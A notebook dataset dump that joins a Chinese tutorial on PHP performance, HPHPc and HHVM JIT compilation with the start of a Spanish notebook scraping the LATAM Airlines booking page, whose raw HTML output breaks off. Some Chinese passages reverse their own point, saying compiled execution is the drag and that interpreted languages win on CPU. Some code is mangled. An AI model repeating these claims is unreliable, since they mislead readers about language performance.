"##### Pros\n\n一般我们使用脚本语言 (Perl,Python,PHP,JavaScript)是为了以下几个目的\n\n1. 大部分的脚本语言都拥有较为完备的外部库,能够帮助开发者快速的开发/测试\n\n - 使用 Python 作为 ebt 的技术栈也是因为 `numpy`, `pandas` 等数据科学库的支持比别的编程语言更加的完备\n\n2. 动态语言的特性使得开发过程变得异常轻松,可以最大程度的实现可复用性和多态性,打个比方\n\n - Python\n\n ```python\n def evaluate(model_impl, params):\n return model_impl.calculate(params)\n\n\n class Model(object):\n def calculate(params):\n sum_val = 0\n for param in params:\n sum_val += param\n\n return sum_val\n ```\n\n - C++\n\n ```cpp\n class IModel {\n public:\n virtual double calculate(const vector<double> ¶ms) = 0;\n virtual int calculate(const vector<int> ¶ms) = 0;\n }\n\n class Model : public IModel {\n public:\n double calculate(const vector<double> ¶ms) {\n double sum_val = 0;\n for (vector<double>::iterator it = params.begin(); it != params.end(); ++it) {\n sum_val += *it;\n }\n return sum_val;\n }\n\n int calculate(const vector<int> ¶ms) {\n int sum_val = 0;\n for (vector<int>::iterator it = params.begin(); it != params.end(); ++it) {\n sum_val += *it;\n }\n return sum_val;\n }\n }\n\n double evaluate(IModel* model_impl, const vector<double> ¶ms) {\n return model_impl->calculate(params);\n }\n\n int evaluate(IModel* model_impl, const vector<int> ¶ms) {\n return model_impl->calculate(params);\n }\n ```\n\n - 模版\n\n ```cpp\n // This is ok but template is not a general feature for all static typed language\n template <typename T>\n T evaluate(IModel* model_impl, const vector<T> ¶ms) {\n return model_impl->calculate<T>(params);\n }\n\n template <typename T>\n\n T::value_type evaluate(IModel* model_impl, const T& params) {\n return model_impl->calculate<T>(params);\n }\n ```\n\n3. 动态语言完全是解释执行,调试成本较低。每当改动源码有所改动后,程序重新运行更加直接,只需要解释器重新读取源码即可。编译性语言需要更多的步骤与时间,例如 C++,为了从源码生成可执行程序需要 链接静态库 -> .obj -> 链接动态库 -> 可执行程序。如果是大型项目开发的话这一步骤甚至会花费几个小时。而解释执行的程序可以不需要这些步骤直接重新运行\n",
"_____no_output_____"
],
[
"##### Cons\n\n但是对于有较高性能需求的 situation,编译执行反而会成为拖累。\n\n> Although easy to implement, interpreters are generally slow, which makes scripting language prohibitive for implementing large, CPU-intensive applications. (Zhao, 2021)\n\nDebian 有一个 [benchmark game](https://benchmarksgame-team.pages.debian.net/benchmarksgame/index.html),比较了目前比较常见的几种编程语言的运行速度/内存占用/源码大小",
"_____no_output_____"
]
],
[
[
"import pandas as pd\nimport matplotlib.pyplot as plt\nbenchmarks = pd.read_csv('./data/programming_language_benchmarks_game_all_measurements.csv')\n\nbenchmarks.head(10)",
"_____no_output_____"
],
[
"compile_lang_lst = ['clang', 'csharpcore', 'csharppgo', 'gcc', 'gfortran', 'go', 'gpp', 'java', 'rust', 'swift']\ninterpreter_lang_lst = ['node', 'perl', 'php', 'python3']\n\ndef boxplot_by_lang(data: pd.DataFrame, colname: str) -> None:\n fig, ax = plt.subplots()\n index = 1\n for lang in compile_lang_lst:\n ax.boxplot(data[data['lang'] == lang][colname],\n positions=[index],\n labels=[lang],\n boxprops=dict(color='blue'))\n index += 1\n\n for lang in interpreter_lang_lst:\n ax.boxplot(data[data['lang'] == lang][colname],\n positions=[index],\n labels=[lang],\n boxprops=dict(color='green'))\n index += 1\n\n ax.set_title(colname, fontsize=15)\n ax.tick_params(axis='x', labelrotation=45)\n fig.set_size_inches(10, 6)",
"_____no_output_____"
],
[
"filtered = benchmarks[(benchmarks['status'] == 0) & (benchmarks['name'] == 'binarytrees') & (benchmarks['n'] == 21)].reset_index()\nboxplot_by_lang(data=filtered, colname='elapsed(s)')",
"_____no_output_____"
],
[
"boxplot_by_lang(data=filtered, colname='mem(KB)')\n",
"_____no_output_____"
],
[
"boxplot_by_lang(data=filtered, colname='size(B)')\n",
"_____no_output_____"
]
],
[
[
"通过以上数据可以显然看出与编译执行语言相比,解释执行的语言在 CPU 的处理性能有明显的优势,部分编译执行的语言在内存处理(申请与回收)上也有着异常优秀的表现。\n\n像 Meta 这样的巨型公司需要 host 的服务器是也是巨型的\n\n\n<img src='./images/faceboook_datacenter_oregon.png' alt='facebook_datacenter' width='1000' />\n\n上图是 Meta 在 Oregon 的数据中心,据说这两个 building 的造价就高达了 *$750M* (约合 *¥47.78 亿*),并且在 2020 年中 Meta 又在边上造了两个\n\n如此巨型的数据中心的一大作用就是用来做 Facebook 的服务器主机,所以为了优化服务器的物理成本,从代码上优化服务器性能是必然的。\n\n我们都知道 Facebook 是用 PHP 实现的,据 HHVM 的项目主持者之一的 Keith Adams 所说,Facebook 有约莫 $2 \\times 10^7$ 行 PHP 代码 (2012年)。Facebook 的开发者在检查之后发现自己服务器的性能问题很大一部分就是资源的消耗就在 PHP 的解释器本身上,所以需要考虑的就是如何优化 PHP 的性能",
"_____no_output_____"
],
[
"### 如何优化 PHP 的性能\n\n1. 使用性能更好的语言重写服务端,如 C++,GO,Java\n - 重构2千万行代码?算了算了\n\n2. 使用 RPC 将部分业务功能独立,减少 PHP 的处理,比如 Twitter 就将自己的很多业务逻辑从 Ruby on Rails 转为了 Java 和 Scala (前端由 node + react 独立实现)\n\n<img src='./images/twitter_tech_stack.webp' alt='twitter_tech_stack' width=\"1000\" />\n\n - RPC 框架 \n <img src='./images/Thrift_homepage.png' alt='Thrift' width=\"1000\" />\n \n 但是不解决问题\n\n\n3. 以动态扩展的形式优化 PHP 的性能瓶颈,用 PHP 加载 C++ 实现的方式绕开性能瓶颈\n - ebt 目前的解决方案,但是对 Facebook 这样历史包袱过重的源码仓库来说,性能瓶颈并不是 1-2 处小地方,而是不断累积的后果,并且 PHP 的扩展并不像 pybind 一样有比较成熟的加载方式\n\n4. 优化 PHP 的解释器本身\n\n\n### 如何优化 PHP 的解释器\n\n1. 改进自己的源码\n - 用 PHP 写的 PHP 性能分析工具 [XHProf](https://github.com/phacility/xhprof)\n - 定位性能瓶颈处,优化代码逻辑,就像 leetcode 去做到 >99%\n - 优化的不够\n\n2. 优化 PHP 的解释器实现\n - [Zend Engine](https://github.com/php/php-src/tree/master/Zend)\n - 将 PHP 编译为 `opcode` 然后执行 `opcode`\n - 优化 Zend 的性能代价太大,并且还要做到版本的向下兼容\n\n3. 将 PHP 转为 C/C++,然后编译生成\n - Hiphop Compiler for PHP (Zhao, 2012)\n\n <img src='./images/hhvm_autogen.png' alt='hhvm_autogen' width=\"1000\" />\n\n 被认为是一种 Ahead of Time 的方式,能够完成非常多的代码优化(就像 LLVM 一样),但是一个问题就是无法正确支持 PHP 中的部分特性,如 `eval()`, `create_function()` 等\n\n > Support for eval is theoretically possible in HipHop by invoking an interpreter. However, we opted not to implement that because the use of eval exposes serious security problems and is therefore discouraged. (Zhao, 2012)\n\n 就像是在 C++ 里面 `Py_Initialize()` 启动了 Python 环境,对内存消耗和代码优化都不是很友好\n\n4. 实现一个虚拟机,将 PHP 源码转为当前平台的机器码执行 (JVM)\n - 如今的 HHVM\n\n\n## HipHop Compiler for PHP (HPHPc)\n\n### C++ 与 PHP 的特性区别\n\n <img src='./images/php_cpp_table.png' alt='PHP_cpp_table' width='600' />\n\n\n### HPHPc 的编译设计\n\n <img src='./images/hphpc_phases.png' alt='hphpc_phases' width='600' />\n\n```php\n<?php\n\ndefine(\"confName\", \"OOPSLA\");\ndefine(\"firstYear\", 1986);\n\nfunction year($edition) {\n return firstYear - 1 + $edition;\n}\n\necho \"Hello \" . confName . \"'\" . year(27);\n```\n\n#### 1. 生成 AST\n\n读取 PHP 的源码并生成对应的 AST\n\n <img src='./images/ast.png' alt='ast' width=\"1000\" />\n\n\n#### 2. 预分析\n\n遍历 AST 并且记录所有符号的信息(类,函数,变量,全局 const),判断哪些符号是存在同名覆盖的情况需要考虑代码上下文。并且建立符号之间的依赖图,为后续的并行优化提供前置准备\n\n#### 3. 预优化\n\n处理不需要类型就能完成的油画,比如将函数转为内联函数,优化不必要的逻辑判断,移除不可能到达的代码片段等\n\n#### 4. 判断类型\n\n核心部分,基于 Damas-Milner constraint-based 算法判断不同符号的类型\n\n<img src='./images/hphpc_types.png' alt='hphpc_types' width=\"600\" />\n\n`variant` 是 `any` 类型,所有符号在类型推断出类型前都是 `variant` 类型,在推断过程中如果成功判断为任何类型则覆盖 `variant`\n\n#### 5. 后优化\n\n在拥有类型之后,HipHop 编译器会根据类型信息优化包括简单的数值计算和逻辑判断在内的部分代码片段,然后再重新执行一次预优化阶段的优化逻辑\n\n#### 6. 生成\n\n最后编译器会遍历带有类型的,被优化后的 AST,并且生成对应的 C++ 代码,并且运行 gcc 编译 C++ 源码,生成的 C++ 部分包括\n\n1. 类的头文件:每个 PHP 的类实现会生成对应的 C++ 头文件与对应的类声明\n2. PHP 的头文件:每个 PHP 的文件(函数)会生成对应的 C++ 头文件与对应的声明\n3. 具体实现文件:包含了一个或者多个声明类/函数的具体实现\n4. 系统文件:不包含 PHP 的源码内容,但是会记录 Symbol Table\n\n### 如何从 AST 生成 C++ 代码\n\n#### 鸭子类型\n\n除了正常标注类型的符号以外,仍然存在无法判断的 `variant` 类型,需要实现一个 `variant` 类型支持运行时处理的逻辑\n\n#### 动态符号\n\n指符号的具体指向需要运行时判断,如\n\n```python\nif SOME_CONDITION:\n x = 10\nelse:\n x = 'a'\n```\n对于这种情况,HipHop 用一张 *global symbol table* 记录了:\n\n - 全局变量\n - 动态申明的 constant\n - 函数体/类实现中的静态变量\n - 重复定义的函数体/类\n\n所谓重复定义是指在不同文件中定义了同样的函数名/类名(在动态语言中这样做是合法的),GST 会在符号名后添加唯一后缀,然后根据具体 `#include` 语句引用的文件名导向不同后缀的同名函数/类实现。对于静态编译过程中出现的无法处理的**动态符号**,HipHop 会通过类似的逻辑生成临时的 *local symbol table*。\n\n在具体处理实际的 variable 时,编译器会通过当前所处的上下文获取 LST 和 GST,从 table 中获取实际的指向。\n\n同时,HipHop 还支持了动态添加实例属性,如",
"_____no_output_____"
]
],
[
[
"class SomeClass:\n\n def __init__(self):\n pass\n\n\nsome_instance = SomeClass()\nsome_instance.a = 10\nprint(some_instance.a)",
"10\n"
]
],
[
[
"为了实现这样的 feature,HipHop 还实现了一个 *property symbol table*,用于记录符号中的属性,当源码尝试访问实例/类属性时,会通过 PST 找到对应的符号。\n\n但是 HPHPc 的痛点就是\n\n- 无法支持 PHP 的动态方法 `eval()`, `create_function()` 等\n- 并且编译后部署上线的源码重量会比 PHP 要大很多,对于2千万行的源码,这种硬性的成本是毁灭性的",
"_____no_output_____"
],
[
"## HHVM (HipHop Virtual Machine)\n\n会什么虚拟机能够解决传统解释器的问题呢?\n\n### JIT (Just In Time)\n\nJVM,Numba 和 HHVM 都是对解释性语言的 jit 优化,但是尝试过 Numba 的我们也知道,jit 有可能并没有想象中的那么美好,对于一些简单的方法,jit 甚至还会拖累性能",
"_____no_output_____"
]
],
[
[
"def make_it_double(a: int) -> int:\n return a * 2",
"_____no_output_____"
],
[
"%%timeit\nmake_it_double(10)",
"40.1 ns ± 0.152 ns per loop (mean ± std. dev. of 7 runs, 10,000,000 loops each)\n"
],
[
"import numba\n\nmake_it_double_numba = numba.jit(make_it_double)",
"_____no_output_____"
],
[
"%%timeit\nmake_it_double_numba(10)",
"90.7 ns ± 0.405 ns per loop (mean ± std. dev. of 7 runs, 10,000,000 loops each)\n"
]
],
[
[
"从上面的表现可以发现 jit 并不是那么的美好,因为 jit 这个过程也是存在性能损耗的,所以这种简单的方法反而会比普通的解释器慢\n\n<img src='./images/hphpc_vs_hhvm.png' alt='hphpc_vs_hhvm' width=\"600\" />\n\n安卓的目前的运行时方案 ART (Andriod Run Time)作为 Android 上的应用和部分系统服务使用的托管式运行时,采用的就是 HPHPc 的 AOT 方案,其前身 Dalvik 使用的 JIT 方案,但是 ART 虚拟机比 Dalvik 快了一倍多。\n\n为了保证虚拟机 jit 的性能优化,Facebook 招聘了各路神仙\n\n- Andrei Alexandrescu,『Modern C++ Design』和『C++ Coding Standards』的作者,C++ 领域无可争议的大神\n- Keith Adams,负责过 VMware 核心架构,当年 VMware 就派他一人去和 Intel 进行技术合作,足以证明在 VMM 领域他有多了解了\n- Drew Paroski,在微软参与过 .NET 虚拟机开发,改进了其中的 JIT\n- Jason Evans,开发了 jemalloc,减少了 Firefox 一半的内存消耗\n- Sara Golemon,『Extending and Embedding PHP』的作者,PHP 内核专家\n\n### Interpreter\n\nHHVM 在 parse 完 PHP 源码会生成一种 Bytecode (opcode),储存在 .hhvm.hhbc 文件中索引,在执行 Bytecode 时和 Zend 类似,将不同的字节码放到不同的函数中去实现 (Subroutine threading)。具体的生成逻辑在 `hphp/runtime/vm/hhbc.cpp`\n\n因为重新实现了解释器,HHVM 比起 HPHPc 能够提供更加优异的兼容性,理论上可以做到对 PHP 所有特性的完美兼容,但是这样的性能还是走了 Zend 的老路子,并且对于动态类型,需要实现类似于如下的判断\n\n```cpp\nVMType::Variant VMExecutionContext::add(const VMType::Variant &left, const VMType::Variant &right) {\n if (this->GST[left.uid] == VMType::Int64 && this->GST[right.uid] == VMType::Int64) {\n return this->IntAddImpl->exec(left, right);\n }\n // TODO: some other impl\n}\n```\n\n而我们知道这样的 if else 条件判断对 CPU 的执行优化是严重的拖累,另一个问题是需要从数据都是储存在对象中,作为 boxed structure 每次的间接获取地址也是有成本的,所以需要 jit 的实现来完成这些工作\n\n### JIT Impl\n\n其实本质上 jit 和 `eval()` 是类似的,只不过 jit eval 的不是源码字符串,而是不同平台下的机器码。HHVM 实现了一个 x64 的机器码生成器(HHBBC)。\n\n常见的 jit 触发条件有两种\n\n- trace:记录循环执行次数,如果超过一定数量就对这段代码进行 jit\n- method:记录函数执行次数,如果超过一定数量就对这个函数内的代码片段进行 jit,如果过于 hot 就直接改为 inline\n\n关于这两种方法哪种更好在 [Lambada](http://lambda-the-ultimate.org/node/3851) 上有个帖子引来了各路大神的讨论,尤其是 Mike Pall(LuaJIT 作者) 、Andreas Gal(Mozilla VP) 和 Brendan Eich(Mozilla CTO)都发表了很多自己的观点,两者的区别不仅仅是编译的范围,还有包括局部变量处理在内的很多细节方面都不太一样。\n\n然而 HHVM 自创了一种叫做 tracelet 的方式,根据类型划分\n\n<img src='./images/hhvm_tracelet.png' alt='hhvm_tracelet' width=\"1000\" />\n\ntracelet 将一个函数划分了 3 个部分,A,C用于处理入参 `$k` 是 integer 或者 string 两种类型的情况,B 用于处理返回值,因此 HHVM 的 jit 触发更像是与类型相关,具体如何分析和拆解 tracelet 的细节在 `hphp/runtime/vm/jit` 中,太深了就不需要了解了。\n\n当然 HHVM 的 jit 优化还体现在很多地方,比如 如果 C 比 A 更加 hot(命中次数更多),HHVM 就会在 jit 的过程中倾向于把 C 放在 A 的前面,据说这样的操作提升了 14% 的性能,因为这样更容易提前命中需要相应的类型。\n\n### Hack\n\nhhvm/jit 的关键是类型,而猜测类型就像上面的例子一样是一个对 CPU 非常不友好的操作,所以 HHVM 的开发者就开始考虑为 PHP 添加类型支持,推出了一个新的语言 - Hack,通过静态类型指定让 HHVM 能够更好的提供性能优化。同时也能够让代码可读性大大提升,方便 IDE 提供更多帮助,在编码阶段减少很多没有必要的 bug。",
"_____no_output_____"
],
[
"## Conclusion\n\nHPHPc / HHVM 作为两种为动态的脚本语言提供性能优化的方案都是有可取之处的,HPHPc 能够在静态编译的过程中完成各种可能的性能优化,比起 HHVM 的优化, HPHPc 的优化能够更加稳定,AOT 是一种非常成熟的优化方案\n\nHHVM 则能够更加完美的兼容动态语言的特性,jit 是一种近年来发展迅速的技术,迭代更新快,能够一直保持对性能的优化。",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
]
] |
cb030d38be823f327a61d9f74e956baa74f8eaca | 66,929 | ipynb | Jupyter Notebook | NoteBooks/Curso de WebScraping/Unificado/web-scraping-master/Clases/Módulo 3_ Scraping con Selenium/M3C8. Demoras dinámicas.ipynb | Alejandro-sin/Learning_Notebooks | 161d6bed4c7b1d171b45f61c0cc6fa91e9894aad | [
"MIT"
] | 1 | 2021-02-26T13:12:22.000Z | 2021-02-26T13:12:22.000Z | NoteBooks/Curso de WebScraping/Unificado/web-scraping-master/Clases/Módulo 3_ Scraping con Selenium/M3C8. Demoras dinámicas.ipynb | Alejandro-sin/Learning_Notebooks | 161d6bed4c7b1d171b45f61c0cc6fa91e9894aad | [
"MIT"
] | null | null | null | NoteBooks/Curso de WebScraping/Unificado/web-scraping-master/Clases/Módulo 3_ Scraping con Selenium/M3C8. Demoras dinámicas.ipynb | Alejandro-sin/Learning_Notebooks | 161d6bed4c7b1d171b45f61c0cc6fa91e9894aad | [
"MIT"
] | null | null | null | 50.588813 | 12,551 | 0.597828 | [
[
[
"# Módulo 2: Scraping con Selenium\n## LATAM Airlines\n<a href=\"https://www.latam.com/es_ar/\"><img src=\"https://i.pinimg.com/originals/dd/52/74/dd5274702d1382d696caeb6e0f6980c5.png\" width=\"420\"></img></a>\n<br>\n\nVamos a scrapear el sitio de Latam para averiguar datos de vuelos en funcion el origen y destino, fecha y cabina. La información que esperamos obtener de cada vuelo es:\n- Precio(s) disponibles\n- Horas de salida y llegada (duración)\n- Información de las escalas\n\n**¡Empecemos!**\nUtilicemos lo aprendido hasta ahora para lograr el objetivo propuesto",
"_____no_output_____"
]
],
[
[
"import requests\nfrom bs4 import BeautifulSoup",
"_____no_output_____"
],
[
"url = 'https://www.latam.com/es_ar/apps/personas/booking?fecha1_dia=18&fecha1_anomes=2019-12&auAvailability=1&ida_vuelta=ida&vuelos_origen=Buenos%20Aires&from_city1=BUE&vuelos_destino=Madrid&to_city1=MAD&flex=1&vuelos_fecha_salida_ddmmaaaa=18/12/2019&cabina=Y&nadults=1&nchildren=0&ninfants=0&cod_promo=#/'",
"_____no_output_____"
],
[
"r = requests.get(url)",
"_____no_output_____"
],
[
"r.status_code",
"_____no_output_____"
],
[
"s = BeautifulSoup(r.text, 'lxml')",
"_____no_output_____"
],
[
"print(s.prettify())",
"<!DOCTYPE html>\n<html lang=\"es\">\n <head>\n <meta content=\"text/html; charset=utf-8\" http-equiv=\"Content-Type\"/>\n <meta content=\"IE=edge,chrome=1\" http-equiv=\"X-UA-Compatible\"/>\n <title>\n Selecciona tus vuelos | LATAM Airlines\n </title>\n <meta content=\"width=device-width, initial-scale=1.0\" name=\"viewport\"/>\n <link href=\"https://s.latamstatic.com/static/latam/images/favicon/LATAM/favicon.ico\" rel=\"shortcut icon\" type=\"image/x-icon\"/>\n <meta content=\"personas_bs3_latam_mu\" name=\"layout\"/>\n <meta content=\"LAN.com\" name=\"description\"/>\n <meta content=\"LAN.com\" name=\"keywords\"/>\n <meta content=\"B90D7B166BC8D2088504237E75BD91D8\" name=\"sessionId\" scheme=\"tracker\"/>\n <meta content=\"latam\" name=\"matchedScenario\" scheme=\"tracker\"/>\n <meta content=\"personas_bs3_latam_mu\" name=\"template\" scheme=\"tracker\"/>\n <meta content=\"null\" name=\"userDataCookieRawData\" scheme=\"tracker\"/>\n <meta content=\"3.0.53\" name=\"appVersion\" scheme=\"tracker\"/>\n <style>\n .async-hide{opacity:0!important}\n </style>\n <script>\n (function(a,s,y,n,c,h,i,d,e){s.className+=' '+y;h.start=1*new Date;h.end=i=function(){s.className=s.className.replace(RegExp(' ?'+y),'')};(a[n]=a[n]||[]).hide=h;setTimeout(function(){i();h.end=null},c);h.timeout=c;})(window,document.documentElement,'async-hide','dataLayer',4000,{'GTM-K6HPBWM':true});\n </script>\n <script>\n (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');ga('create','UA-111120716-2','auto',{allowLinker:true});ga('require','GTM-K6HPBWM');\n </script>\n <script type=\"text/javascript\">\n (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-MJ285C5');\n </script>\n <script src=\"https://s.latamstatic.com/js/libs/external/modernizr/2.6.2/modernizr.custom.js\" type=\"text/javascript\">\n </script>\n <!--[if lt IE 9]>\n\t <script src=\"/js/libs/external/compatibility/shiv/3.7.0/html5shiv.js\"></script>\n <![endif]-->\n <!--[if lt IE 9]>\n\t <script src=\"/js/libs/external/respond/1.4.2/respond.min.js\"></script>\n<![endif]-->\n </head>\n <body onload=\"removeBodyPadding();\">\n <div class=\"hyf-modal-black\">\n </div>\n <div class=\"hyf-mu-wrapper\">\n <noscript>\n <iframe height=\"0\" src=\"//www.googletagmanager.com/ns.html?id=GTM-MJ285C5\" style=\"display: none; visibility: hidden\" width=\"0\">\n </iframe>\n </noscript>\n <style id=\"styleHeaderLatam\">\n html{margin:0;padding:0;min-height:100%;position:relative}body{margin:0;padding:0}a>[class^=\"icon-\"],a>[class*=\"icon-\"]{margin:5px 22px 0 0}.hyf-modal-black{display:none;opacity:1;background-color:rgba(0,0,0,.8);position:fixed;top:0;left:0;right:0;bottom:0;margin:0;z-index:99999999998;-webkit-transition:all 1s;-moz-transition:all 1s;transition:all 1s}.hyf-not-underline{text-decoration:none}.hyf-icon-clear{float:none;margin:0}.hyf-mobile-view{height:100%;overflow:hidden}.hyf_mu_wrapper,.hyf_mu_header,.hyf-mu-content,.hyf-mu-footer{padding:0;margin:0}.hyf_mu_wrapper{min-height:100%;position:relative}.hyf-mu-header{position:relative}@media (min-width:768px){.hyf-mu-header{position:fixed;top:0;width:100%;z-index:100}#appMain{margin-top:36px}}.hyf-mu-header-container{height:36px;background-color:#1b0088;position:relative;font-family:'Latam-Sans-Regular'}.hyf-mu-content{}.hyf-mu-footer{background:#1b0088;width:100%;position:absolute;bottom:0;left:0}.hyf-goleft{position:relative;float:left}.hyf-alleft{text-align:left}.hyf-goright{position:relative;float:right}.hyf-alright{text-align:right}.hyf-container{max-width:960px;margin:0 auto;position:relative}.hyf-goup{text-transform:uppercase}.hyf-col-25{width:25%;float:left}.hyf-col-100{width:100%;float:left}.hyf-header-section{height:36px;font-size:1em}.hyf-header-section .hyf-header-element{vertical-align:middle;padding:8px 0;text-decoration:none;color:#b8b8b8;margin:0 5px;border:none;top:6px;position:relative}.hyf-contry-ul li a:focus{outline:#1b0088 auto 2px}.hyf-header-section .hyf-header-element span{padding-top:5px;margin:0;color:#fff}.hyf-header-section .hyf-header-element.hyf-goup.hyf-pais-show:hover{background-color:#f3f3f3;color:#1b0088}.hyf-header-section .hyf-header-element.hyf-goup.hyf-pais-hide{background-color:#f3f3f3;background-color:rgba(243,243,243,97);color:#1b0088}.hyf-header-section .hyf-header-element.hyf-goup.hyf-pais-hide:focus{border:none}.hyf-header-section .hyf-header-element.hyf-login{display:none;text-align:left;text-decoration:none;font-size:14px;font-family:'Latam-Sans-Regular',arial,sans-serif;border:0;color:#fff;padding:0 0 0 40px}.hyf-header-section .hyf-header-element.hyf-login span{color:#fff;text-decoration:none}.hyf-header-section .hyf-header-element.hyf-login span:hover{text-decoration:none}.hyf-header-section .hyf-header-element a.hyf-login:hover{background-color:#ed1650;text-decoration:none}.hyf-login-info{position:absolute;margin-left:-40px;background-color:#fff;padding:10px 25px 20px 25px;border-bottom-left-radius:5px;width:100%;border-bottom-right-radius:5px;border-top-left-radius:0;border-top-right-radius:0;border:1px solid #bfbfbf;color:#666;z-index:2;display:none}.hyf-login-info a{display:block;margin:6px 0;color:#666;text-decoration:none;font-family:'Latam-Sans-Bold'}.hyf-login-info a:hover{text-decoration:underline}.hyf-login-info a:last-child{text-align:right;margin-top:15px;margin-bottom:0;border-top:2px solid #b30f3b;padding-top:10px}.hyf-login-link{color:#fff;text-decoration:none}.hyf-login-text{max-width:223px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}#hyf-icon-log-icon,#hyf-icon-log-iconi{margin:-5px -28px -13px -45px;color:#fff}#hyf-icon-log-caret{float:right;margin:10px 5px;color:#fff}.hyf-country-selector{position:absolute;overflow:hidden;border:1px solid #f3f3f3;border-radius:0 0 1px 1px;padding:10px 15px;color:#666;text-align:left;z-index:99999999999;max-width:930px;box-sizing:border-box;-webkit-box-shadow:0 1px 1.68px 1.32px rgba(0,2,0,.5);-moz-box-shadow:0 1px 1.68px 1.32px rgba(0,2,0,.5);box-shadow:0 1px 1.68px 1.32px rgba(0,2,0,.5)}.hyf-country-selector ul{list-style:none;margin:0;padding:0}.hyf-country-selector ul li{list-style:none;margin:0 0 10px 0;padding:0;font-size:1em}.hyf-country-selector .hyf-country-selector-title{font-size:1em;font-family:'Latam-Sans-Bold';margin-top:10px;margin-bottom:11px}.hyf-logo{padding:0;height:70px;line-height:80px;margin-top:20px;margin-bottom:20px;position:relative}.hyf-logo a{position:relative;margin-right:42px}.hyf-header-section .hyf-header-element.Header-actionLinkBurger{padding:0;width:24px;height:24px;background:url(https://www.latam.com/static/latam/images/content-image/header/icn-burger.svg) no-repeat center center}.hyf-header-section .hyf-header-element.Header-userLink{padding:0;width:24px;height:24px;float:none;top:0;right:20px}.hyf-only-focusable{position:absolute;width:1px;height:1px;padding:0;margin:-1px;overflow:hidden;clip:rect(0,0,0,0);border:0}.hyf-only-focusable:focus{position:relative;width:auto;height:auto;overflow:hidden;clip:auto;display:inline-block;background-color:#fff;color:#1b0088;margin:5px;outline:2px solid #1b0088;outline-offset:0}.text-skip-to-main-content{margin:0}.hyf-header-section .hyf-header-element:focus{outline:2px solid #b8b8b8;outline-offset:0}.hyf-logo a:focus{outline:2px solid #1b0088}.hyf-logoLink{position:absolute;top:5px;left:5px}.hyf-logoLink:focus{outline:2px solid #b8b8b8;outline-offset:0}.hyf-logoOneWorldLink{position:absolute;top:5px;left:100px}.hyf-logoOneWorldLink:focus{outline:2px solid #b8b8b8;outline-offset:0}#mobileHeader{background-color:#1b0088;border-bottom-color:#b8b8b8;font-family:'Latam-Sans-Regular';color:#fff;font-size:14px;height:50px;padding-top:10px;position:relative}#mobileTitle{font-size:25px;font-weight:700;margin:0;text-align:center;color:#fff}.hyf-returnLink{float:left}#hyf-returnLink:focus{outline:2px solid #b8b8b8;outline-offset:0}.hyf-cs-div{background-color:#fff;position:absolute;height:80px;top:0;left:0;width:100%;padding:10px;overflow:hidden}.hyf-cs-div a{width:100%;display:block;margin:10px 5px;text-decoration:none;color:#666}.hyf-cs-margin{position:relative;height:60px}#hideMenu,#hyf-country-selector{display:none}a.hyf-login-link{outline:none;text-decoration:none}.lt-icon-flag{background-image:url(https://www.latam.com/static/latam/images/design-image/sprites/icon-sprite.png);float:left;margin:5px 22px 0 0}.lt-icon-ar-small{background-position:-85px -120px;width:17px;height:11px}.lt-icon-ar{background-position:0 -100px;width:30px;height:20px}.lt-icon-au-small{background-position:-51px -120px;width:17px;height:11px}.lt-icon-au{background-position:-30px -20px;width:30px;height:20px}.lt-icon-br-small{background-position:-17px -120px;width:17px;height:11px}.lt-icon-br{background-position:-30px -40px;width:30px;height:20px}.lt-icon-ca-small{background-position:-120px -99px;width:17px;height:11px}.lt-icon-ca{background-position:-60px -20px;width:30px;height:20px}.lt-icon-cl-small{background-position:-120px -77px;width:17px;height:11px}.lt-icon-cl{background-position:0 -60px;width:30px;height:20px}.lt-icon-co-small{background-position:-30px -100px;width:17px;height:11px}.lt-icon-co{background-position:-60px -60px;width:30px;height:20px}.lt-icon-de-small{background-position:-120px -33px;width:17px;height:11px}.lt-icon-de{background-position:-90px -20px;width:30px;height:20px}.lt-icon-ec-small{background-position:-120px -11px;width:17px;height:11px}.lt-icon-ec{background-position:-90px -60px;width:30px;height:20px}.lt-icon-es-small{background-position:-98px -100px;width:17px;height:11px}.lt-icon-es{background-position:-30px -80px;width:30px;height:20px}.lt-icon-eu-small{background-position:-64px -100px;width:17px;height:11px}.lt-icon-eu{background-position:-90px -80px;width:30px;height:20px}.lt-icon-fr-small{background-position:-47px -100px;width:17px;height:11px}.lt-icon-fr{background-position:0 0;width:30px;height:20px}.lt-icon-it-small{background-position:-120px -55px;width:17px;height:11px}.lt-icon-it{background-position:-60px -80px;width:30px;height:20px}.lt-icon-mx-small{background-position:-81px -100px;width:17px;height:11px}.lt-icon-mx{background-position:0 -80px;width:30px;height:20px}.lt-icon-nz-small{background-position:-120px 0;width:17px;height:11px}.lt-icon-nz{background-position:-90px -40px;width:30px;height:20px}.lt-icon-otros_paises-small{background-position:-120px -22px;width:17px;height:11px}.lt-icon-otros_paises{background-position:-90px 0;width:30px;height:20px}.lt-icon-pe-small{background-position:-120px -44px;width:17px;height:11px}.lt-icon-pe{background-position:-30px -60px;width:30px;height:20px}.lt-icon-pr-small{background-position:-120px -66px;width:17px;height:11px}.lt-icon-pr{background-position:-60px -40px;width:30px;height:20px}.lt-icon-sa-small{background-position:-120px -88px;width:17px;height:11px}.lt-icon-sa{background-position:-60px 0;width:30px;height:20px}.lt-icon-ue-small{background-position:0 -120px;width:17px;height:11px}.lt-icon-ue{background-position:0 -40px;width:30px;height:20px}.lt-icon-uk-small{background-position:-34px -120px;width:17px;height:11px}.lt-icon-uk{background-position:0 -20px;width:30px;height:20px}.lt-icon-uy-small{background-position:-68px -120px;width:17px;height:11px}.lt-icon-uy{background-position:-30px 